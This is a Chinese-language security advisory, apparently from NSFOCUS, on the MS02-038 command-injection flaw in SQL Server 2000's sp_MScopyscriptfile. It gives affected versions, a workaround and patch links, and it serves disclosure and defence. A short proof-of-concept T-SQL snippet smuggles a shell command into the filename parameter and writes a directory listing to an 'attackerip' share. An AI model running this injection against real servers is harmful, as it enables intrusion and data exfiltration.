首页 -> 安全研究

安全研究

安全漏洞
Microsoft SQL Server 2000复制存储过程远程可插入漏洞(MS02-038)

发布日期:2002-07-25
更新日期:2002-07-30

受影响系统:
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000 Desktop Engine
Microsoft SQL Server 2000
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 5309
CVE(CAN) ID: CVE-2002-0645

Microsoft SQL Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统。

Microsoft SQL Server中的用于复制的存储过程Sp_MScopyscriptfile对用户提交的参数缺少正确的过滤,远程攻击者可以利用这个漏洞以SQL Server Agent Proxy帐户权限在系统上执行任意命令。

Sp_MScopyscriptfile存储过程可以在SQL服务器复制目录中建立目录,然后拷贝脚本到此木中,这个存储过程包含@scriptfile输入参数,用于要拷贝脚本文件的名称,Sp_MScopyscriptfile存储过程对这个外部提供的参数缺少正确的过滤,远程攻击者可以在这个参数中插入操作系统命令并通过xp_cmdshell执行,如果SQL Server Agent Proxy帐户在系统中存储的情况下,攻击者可以以SQL Server Agent Proxy帐户的权限在系统中执行任意命令,不过默认SQL Server Agent Proxy帐户需要SQL管理员权限激活。

<*来源:c c (cesarc56@yahoo.com
  
  链接:http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0033.html
        http://www.appsecinc.com/resources/alerts/mssql/02-0011.html
        http://www.microsoft.com/technet/security/bulletin/MS02-038.asp
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

c c (cesarc56@yahoo.com)提供了如下测试方法:

declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 如果您已经手工启用了SQL Server Agent Proxy账号的话,您应该立刻禁用此帐号。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS02-038)以及相应补丁:
MS02-038:Unchecked Buffer in SQL Server 2000 Utilities Could Allow Code Execution(Q316333)
链接:http://www.microsoft.com/technet/security/bulletin/MS02-038.asp

补丁下载:

    * SQL Server 2000:
       http://support.microsoft.com/support/misc/kblookup.asp?id=Q316333

浏览次数:6423
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障